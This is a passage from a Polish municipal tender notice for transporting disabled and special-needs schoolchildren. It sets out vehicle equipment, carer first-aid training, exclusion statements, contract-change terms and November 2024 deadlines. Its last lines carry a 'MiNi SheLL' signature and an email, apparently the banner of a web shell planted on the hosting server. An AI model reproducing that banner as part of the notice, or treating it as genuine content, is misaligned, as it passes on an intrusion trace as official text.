zawodowej.<br/> 1/ Wykonawca spełni ww. warunek udziału w postępowaniu, jeśli wykaże, że dysponuje osobami (pełnoletnimi) uczestniczącymi w wykonaniu zamówienia, posiadającymi udokumentowane przeszkolenie w zakresie udzielania pierwszej pomocy przedmedycznej, w liczbie umożliwiającej realizację przedmiotu zamówienia, to jest jeden opiekun na jeden pojazd.<br/> 2/ Wykonawca spełni ww. warunek udziału w postępowaniu, jeśli wykaże, że dysponuje dla: <br/> Zadania I - przewóz dzieci i młodzieży szkolnej z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do placówek oświatowych zlokalizowanych na terenie miasta Gorzowa Wielkopolskiego:<br/>• minimum 1 autobusem wyposażonym w co najmniej 13 miejsc siedzących, nie starszym niż 3 lata na dzień złożenia oferty, przystosowanym homologacyjnie do przewozu osób niepełnosprawnych, w tym minimum jednej osoby na wózku inwalidzkim, spełniającym przepisy ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (t.j. Dz. U. z 2024r., poz. 1251), przy pomocy którego Wykonawca będzie świadczył usługę transportu/przewozu uczniów z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do placówek oświatowych zlokalizowanych na terenie Miasta Gorzowa Wlkp. Pojazd ten musi być wyposażony w:<br/>- sprawną klimatyzację w części pasażer i kierowca,<br/>- dodatkowe sprawne ogrzewanie postojowe działające niezależnie od pracy silnika,<br/>- dodatkowe atestowane pasy bezpieczeństwa umożliwiające bezpieczne przypięcie wózka oraz osób poruszających się na wózkach inwalidzkich na czas transportu,<br/>- fotele wyposażone w trójpunktowe pasy bezpieczeństwa każdy,<br/>- dodatkowy wysuwany stopień przy drzwiach bocznych, ułatwiający wsiadanie <br/>i wysiadanie osobom niepełnosprawnym z pojazdu, w szczególności osobom ograniczonym ruchowo,<br/>- dodatkowe poręcze lub uchwyty umożliwiające bezpieczne wsiadanie i wysiadanie osobom niepełnosprawnym z pojazdu,<br/>- atestowaną windę załadowczą, posiadającą aktualne badania i przegląd Urzędu Dozoru Technicznego,<br/>- oznakowanie pojazdu zgodnie z obowiązującymi przepisami, <br/>- aktualne ubezpieczenie OC pojazdu i NNW przewożonych osób i aktualny przegląd techniczny pojazdu.<br/><br/> Dla Zadania II - przewóz dzieci i młodzieży szkolnej z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do Ośrodka Szkolno-Wychowawczego TPD <br/>w Myśliborzu, ul. Spokojna 22.<br/>• minimum 1 pojazdem 9-osobowym, nie starszym niż 3 lata na dzień złożenia oferty, przystosowanym homologacyjnie do przewozu osób niepełnosprawnych, spełniającym przepisy ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (t.j. Dz. U. z 2024r., poz. 1251), przy pomocy którego Wykonawca będzie świadczył usługę transportu/przewozu uczniów z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do Ośrodka Szkolno-Wychowawczego TPD w Myśliborzu. Pojazd musi być wyposażony w:<br/>- sprawną klimatyzację w części pasażer i kierowca,<br/>- dodatkowe sprawne ogrzewanie postojowe działające niezależnie od pracy silnika,<br/>- fotele wyposażone w trójpunktowe pasy bezpieczeństwa każdy,<br/>- dodatkowy wysuwany stopień przy drzwiach bocznych, ułatwiający wsiadanie <br/>i wysiadanie osobom niepełnosprawnym z pojazdu w szczególności osobom ograniczonym ruchowo,<br/>- dodatkowe poręcze lub uchwyty umożliwiające bezpieczne wsiadanie i wysiadanie osobom niepełnosprawnym z pojazdu,<br/>- oznakowanie pojazdu zgodnie z obowiązującymi przepisami,<br/>- aktualne ubezpieczenie OC pojazdu i NNW przewożonych osób i aktualny przegląd techniczny pojazdu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3)	W celu potwierdzenia aktualności informacji zawartych w oświadczeniu wstępnym dotyczących braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający żąda następujących oświadczeń: <br/>a) oświadczenia o braku skazania za przestępstwa wskazane w art. 108 ust. 1 pkt. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U.2024.1320 t. j.) - Załącznik nr 9 do SWZ.<br/>b)	oświadczenia składane w związku z art. 108 ust. 1 pkt. 3 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U.2024.1320 t.j.) o braku wyroku sądu lub decyzji <br/>o zaleganiu z uiszczeniem podatków, opłat lub składek ZUS - Załącznik nr 7do SWZ.<br/>c)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 Pzp. <br/>d)	oświadczenia o braku podstaw do wykluczenia na podst. art. 108 ust 1 pkt 4 tj. oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne - załącznik nr 8 do SWZ.<br/>e)	oświadczenia o braku podstaw do wykluczenia na podst. art. 108 ust 1 pkt. 5 i pkt. 6 brak podstaw do wykluczenia ze względu na zakłócenie konkurencji załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>Dla zadania I i II <br/>• licencja na wykonywanie transportu drogowego osób udzieloną przez starostę właściwego dla siedziby Wykonawcy zgodnie z ustawą z dnia 06 września 2001r. <br/>o transporcie drogowym (t.j. Dz. U. z 2024 r. poz. 1539).<br/>2)	W celu potwierdzenia spełniania warunku dotyczącego zdolności technicznej lub zawodowej Zamawiający żąda od Wykonawcy: <br/>• wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, wraz z informacją czy osoba posiada przeszkolenia w zakresie udzielania pierwszej pomocy, doświadczenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami. Załącznik nr 11 do SWZ.<br/>oraz <br/>Dla Zadania I - przewóz dzieci i młodzieży szkolnej z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do placówek oświatowych zlokalizowanych na terenie miasta Gorzowa Wielkopolskiego.<br/>• wykaz pojazdów z którego wynika dysponowanie minimum 1 autobusem wyposażonym w co najmniej 13 miejsc siedzących, nie starszym niż 3 lata na dzień złożenia oferty, przystosowanym homologacyjnie do przewozu osób niepełnosprawnych, w tym minimum jednej osoby na wózku inwalidzkim, spełniającym przepisy ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (t.j. Dz. U. z 2024r., poz. 1251), przy pomocy którego Wykonawca będzie świadczył usługę transportu/przewozu uczniów z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do placówek oświatowych zlokalizowanych na terenie Miasta Gorzowa Wlkp. <br/><br/> Dla Zadania II - przewóz dzieci i młodzieży szkolnej z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do Ośrodka Szkolno-Wychowawczego TPD <br/>w Myśliborzu, ul. Spokojna 22.<br/>• wykaz pojazdów z którego wynika fakt dysponowania minimum1 pojazdem 9 osobowym, nie starszym niż 3 lata na dzień złożenia oferty, przystosowanym homologacyjnie do przewozu osób niepełnosprawnych, spełniający przepisy ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (t.j. Dz. U. z 2024r., poz. 1251), przy pomocy którego Wykonawca będzie świadczył usługę transportu/przewozu uczniów z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do Ośrodka Szkolno-Wychowawczego TPD w Myśliborzu. <br/><br/>Pozostałe warunki, z uwagi na określoną liczbę znaków w tym punkcie ogłoszenia zostały opisane w SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Po podpisaniu umowy a przez przed rozpoczęciem realizacji usługi Wykonawca zobowiązuje się dostarczyć kopię polisy lub innego dokumentu potwierdzającego fakt zawarcia ubezpieczenia z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem umowy - posiadania ważnej (opłaconej) polisy ubezpieczeniowej z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem umowy przez cały okres realizacji przedmiotu umowy;<br/>w przypadku wygaśnięcia polisy w trakcie realizacji przedmiotu umowy Wykonawca zobowiązany jest dostarczyć Zamawiającemu (do Referatu Infrastruktury Technicznej, Ochrony Środowiska i Rolnictwa), potwierdzoną za zgodność z oryginałem, kopię kolejnej polisy, tak aby Zamawiający zawsze był w posiadaniu kopii ważnej polisy. <br/>2.Wykonawca po podpisaniu umowy zobowiązany jest do zapoznania się i stosowania &#34;Standardów Ochrony Małoletnich&#34; obowiązujących w przewozach dzieci i uczniów z terenu Gminy Lubiszyn transportem zorganizowanym, wprowadzonych zarządzeniem Wójta Gminy Lubiszyn Nr 80/2024 z dnia 09 sierpnia 2024r. oraz złożenia oświadczenia o zobowiązaniu się do stosowania w/w Standardów, przygotowania pracowników realizujących transport do stosowania zapisów w/w dokumentu oraz zapewnienia dzieciom dostępu do treści Standardów w wersji skróconej (załącznik nr 1 do SOM).<br/>3.Po podpisaniu umowy Wykonawca zobowiązany jest dostarczyć Zamawiającemu dokumenty dotyczące zatrudnionych kierowców i opiekunów: oświadczeń o niekaralności, oświadczeń o zapoznaniu się ze Standardami Ochrony Małoletnich, zobowiązaniu do przestrzegania zapisów w/w dokumentu oraz reagowania na sytuacje zagrażające bezpieczeństwu dzieci i informowania o nich (wg załącznika nr 2 do SOM). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Do oferty Wykonawca dołącza aktualne na dzień składania ofert oświadczenie o spełnieniu warunków udziału w postępowaniu i braku podstaw wykluczenia. Informacje zawarte w oświadczeniu stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. Wzór oświadczenia stanowi Załącznik nr 2 do SWZ.<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 1 składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie – Załącznik nr 2 do SWZ to musi potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>3.	W przypadku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. konsorcjum, spółki cywilnej Zamawiający wymaga przekazania przez przystąpieniem do podpisania umowy kopii umowy regulującej współpracę wykonawców. Kopia umowy musi być potwierdzona za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. W trakcie trwania umowy dopuszcza się wprowadzenie zmian wskazanych w art. 455 ustawy Pzp oraz następujących zmian do jej treści: danych dotyczących stron umowy, jak zmiana nazwy, siedziby, adresu, numeru konta bankowego, osób upoważnionych jako przedstawiciele stron.<br/>2. Wszystkie wprowadzone zmiany mogą być dokonane tylko w odpowiednim zakresie, który wynika z okoliczności powodującej konieczność wprowadzenia zmian do umowy. <br/>3. Zmiany umowy wymagają zgody obu Stron wyrażonej w formie pisemnej pod rygorem nieważności.<br/>4.	Wprowadzenie jakichkolwiek zmian do umowy możliwe jest tylko w granicach określonych art. 455 obowiązującej ustawy Prawo zamówień publicznych.<br/>5. Zamawiający, działając na podstawie art. 455 ust.1 pkt 1 Ustawy, przewiduje również możliwość dokonania m. in. następujących zmian umowy:<br/> a) stawki podatku od towarów i usług oraz podatku akcyzowego<br/> b) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę; (t.j. z 2020 r., poz. 2207 ze zm.).<br/> c) zasad podlegania ubezpieczeniom społecznym i ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne <br/> d) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę<br/> 6. Zmiana wynagrodzenia może być dokonana w formie aneksu do umowy według następujących zasad:<br/> a) każdej ze stron przysługuje prawo zgłoszenia drugiej stronie żądania zmiany wysokości wynagrodzenia należnego Wykonawcy,<br/> b) żądanie zmiany wysokości wynagrodzenia należnego Wykonawcy składa się wraz z uzasadnieniem (wskazując wpływ zmian określonych w art. 436 pkt 4 lit. b ustawy Pzp na koszty wykonania umowy oraz przedstawiającym wyliczenia ww. zmian, a także wskazującym, jakiego wynagrodzenia umownego dotyczy żądanie).<br/> Z uwagi na ograniczoną liczbę znaków w tym punkcie ogłoszenia o zamówieniu, Zamawiający opisał warunki zmiany w umowie w SWZ oraz załączniku do SWZ - wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-21 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://lubiszyn.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-21 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com